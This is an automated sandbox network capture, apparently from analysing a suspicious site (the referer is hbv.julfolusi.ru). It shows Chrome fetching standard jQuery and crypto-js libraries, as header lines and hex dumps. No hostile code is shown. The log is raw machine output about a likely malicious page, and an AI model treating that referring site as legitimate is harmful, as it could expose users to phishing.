                                                                              10192.168.2.649810151.101.194.1374436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:27 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                              Host: code.jquery.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:27 UTC613INHTTP/1.1 200 OK
                                                                              Connection: close
                                                                              Content-Length: 89501
                                                                              Server: nginx
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                              ETag: "28feccc0-15d9d"
                                                                              Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                              Access-Control-Allow-Origin: *
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Via: 1.1 varnish, 1.1 varnish
                                                                              Accept-Ranges: bytes
                                                                              Date: Mon, 20 Jan 2025 13:17:27 GMT
                                                                              Age: 2863573
                                                                              X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740062-EWR
                                                                              X-Cache: HIT, HIT
                                                                              X-Cache-Hits: 2774, 1
                                                                              X-Timer: S1737379048.711433,VS0,VE1
                                                                              Vary: Accept-Encoding
                                                                              2025-01-20 13:17:27 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                              Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                              2025-01-20 13:17:27 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                              Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                              2025-01-20 13:17:27 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                              Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                              2025-01-20 13:17:27 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                              Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                              2025-01-20 13:17:27 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                              Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                              2025-01-20 13:17:27 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                              Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              11192.168.2.649816104.17.24.144436468C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-20 13:17:27 UTC650OUTGET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1
                                                                              Host: cdnjs.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: cross-site
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://hbv.julfolusi.ru/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-20 13:17:28 UTC963INHTTP/1.1 200 OK
                                                                              Date: Mon, 20 Jan 2025 13:17:27 GMT
                                                                              Content-Type: application/javascript; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Access-Control-Allow-Origin: *
                                                                              Cache-Control: public, max-age=30672000
                                                                              ETag: W/"61182885-40eb"
                                                                              Last-Modified: Sat, 14 Aug 2021 20:33:09 GMT
                                                                              cf-cdnjs-via: cfworker/kv
                                                                              Cross-Origin-Resource-Policy: cross-origin
                                                                              Timing-Allow-Origin: *
                                                                              X-Content-Type-Options: nosniff
                                                                              CF-Cache-Status: HIT
                                                                              Age: 1036858
                                                                              Expires: Sat, 10 Jan 2026 13:17:27 GMT
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iebpvnuH4EvE39t51UNvHXnA7gFJVmK2UDtnZBz1PR0EqU9Lm%2F6O7D0zekXk%2B9JGvljl%2Fc4K6cG8OYZMSeadrcf8SQZxyO70iP72tXzhNqphgLGBamb8%2BCMPNa6AOlz%2BQO6jeChc"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                              Strict-Transport-Security: max-age=15780000
                                                                              Server: cloudflare
                                                                              CF-RAY: 904f5849cef14393-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-20 13:17:28 UTC406INData Raw: 37 62 65 65 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 2c 6f 2c 73 2c 61 2c 68 2c 74 2c 65 2c 6c 2c 72 2c 69 2c 63 2c 66 2c 64 2c 75 2c 70 2c 53 2c 78 2c 62 2c 41 2c 48 2c 7a 2c 5f 2c 76 2c 67 2c 79 2c 42 2c 77 2c 6b 2c 6d 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 3d 55 7c 7c 66 75 6e 63 74 69 6f 6e 28 68 29 7b
                                                                              Data Ascii: 7bee!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 54 68 69 73 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3f 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 3a 69 29 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3f 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 3a 69 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 69 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 76 61 72 20 72 3d 4f 62 6a 65 63 74
                                                                              Data Ascii: ypeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 74 2e 77 6f 72 64 73 3d 74 68 69 73 2e 77 6f 72 64 73 2e 73 6c 69 63 65 28 30 29 2c 74 7d 2c 72 61 6e 64 6f 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 76 61 72 20 65 3d 5b 5d 2c 72 3d 30 3b 72 3c 74 3b 72 2b 3d 34 29 65 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 69 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 69 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 28 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 31 29 29 5b 30 5d 7d 63 61 74 63 68 28 74 29 7b 7d 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 69 2e 72 61 6e 64 6f 6d 42
                                                                              Data Ascii: one.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomB
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 74 3d 66 2e 70 61 72 73 65 28 74 29 29 2c 74 68 69 73 2e 5f 64 61 74 61 2e 63 6f 6e 63 61 74 28 74 29 2c 74 68 69 73 2e 5f 6e 44 61 74 61 42 79 74 65 73 2b 3d 74 2e 73 69 67 42 79 74 65 73 7d 2c 5f 70 72 6f 63 65 73 73 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 2c 72 3d 74 68 69 73 2e 5f 64 61 74 61 2c 69 3d 72 2e 77 6f 72 64 73 2c 6e 3d 72 2e 73 69 67 42 79 74 65 73 2c 6f 3d 74 68 69 73 2e 62 6c 6f 63 6b 53 69 7a 65 2c 73 3d 6e 2f 28 34 2a 6f 29 2c 63 3d 28 73 3d 74 3f 68 2e 63 65 69 6c 28 73 29 3a 68 2e 6d 61 78 28 28 30 7c 73 29 2d 74 68 69 73 2e 5f 6d 69 6e 42 75 66 66 65 72 53 69 7a 65 2c 30 29 29 2a 6f 2c 6e 3d 68 2e 6d 69 6e 28 34 2a 63 2c 6e 29 3b 69 66 28 63 29 7b 66 6f 72 28 76 61 72 20 61 3d 30
                                                                              Data Ascii: ==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 66 6f 72 28 76 61 72 20 74 3d 74 68 69 73 2e 5f 58 2c 65 3d 74 68 69 73 2e 5f 43 2c 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 45 5b 72 5d 3d 65 5b 72 5d 3b 65 5b 30 5d 3d 65 5b 30 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 74 68 69 73 2e 5f 62 7c 30 2c 65 5b 31 5d 3d 65 5b 31 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 30 5d 3e 3e 3e 30 3c 45 5b 30 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 32 5d 3d 65 5b 32 5d 2b 38 38 36 32 36 33 30 39 32 2b 28 65 5b 31 5d 3e 3e 3e 30 3c 45 5b 31 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 33 5d 3d 65 5b 33 5d 2b 31 32 39 35 33 30 37 35 39 37 2b 28 65 5b 32 5d 3e 3e 3e 30 3c 45 5b 32 5d 3e 3e 3e 30 3f 31 3a 30 29 7c 30 2c 65 5b 34 5d 3d 65 5b 34 5d 2b 33 35 34 35 30 35 32 33 37 31 2b 28 65 5b 33 5d 3e 3e 3e 30 3c 45 5b 33
                                                                              Data Ascii: for(var t=this._X,e=this._C,r=0;r<8;r++)E[r]=e[r];e[0]=e[0]+1295307597+this._b|0,e[1]=e[1]+3545052371+(e[0]>>>0<E[0]>>>0?1:0)|0,e[2]=e[2]+886263092+(e[1]>>>0<E[1]>>>0?1:0)|0,e[3]=e[3]+1295307597+(e[2]>>>0<E[2]>>>0?1:0)|0,e[4]=e[4]+3545052371+(e[3]>>>0<E[3
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 31 3a 30 3b 66 6f 72 28 72 3d 30 3b 72 3c 38 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 74 5b 72 5d 2b 65 5b 72 5d 2c 6e 3d 36 35 35 33 35 26 69 2c 6f 3d 69 3e 3e 3e 31 36 3b 49 5b 72 5d 3d 28 28 6e 2a 6e 3e 3e 3e 31 37 29 2b 6e 2a 6f 3e 3e 3e 31 35 29 2b 6f 2a 6f 5e 28 28 34 32 39 34 39 30 31 37 36 30 26 69 29 2a 69 7c 30 29 2b 28 28 36 35 35 33 35 26 69 29 2a 69 7c 30 29 7d 74 5b 30 5d 3d 49 5b 30 5d 2b 28 49 5b 37 5d 3c 3c 31 36 7c 49 5b 37 5d 3e 3e 3e 31 36 29 2b 28 49 5b 36 5d 3c 3c 31 36 7c 49 5b 36 5d 3e 3e 3e 31 36 29 7c 30 2c 74 5b 31 5d 3d 49 5b 31 5d 2b 28 49 5b 30 5d 3c 3c 38 7c 49 5b 30 5d 3e 3e 3e 32 34 29 2b 49 5b 37 5d 7c 30 2c 74 5b 32 5d 3d 49 5b 32 5d 2b 28 49 5b 31 5d 3c 3c 31 36 7c 49 5b 31 5d 3e 3e 3e 31 36 29 2b 28 49 5b 30 5d 3c 3c 31 36
                                                                              Data Ascii: 1:0;for(r=0;r<8;r++){var i=t[r]+e[r],n=65535&i,o=i>>>16;I[r]=((n*n>>>17)+n*o>>>15)+o*o^((4294901760&i)*i|0)+((65535&i)*i|0)}t[0]=I[0]+(I[7]<<16|I[7]>>>16)+(I[6]<<16|I[6]>>>16)|0,t[1]=I[1]+(I[0]<<8|I[0]>>>24)+I[7]|0,t[2]=I[2]+(I[1]<<16|I[1]>>>16)+(I[0]<<16
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67 69
                                                                              Data Ascii: uffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={stringi
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b 4c
                                                                              Data Ascii: =r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJKL
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20 6f
                                                                              Data Ascii: abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var o
                                                                              2025-01-20 13:17:28 UTC1369INData Raw: 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77 2c
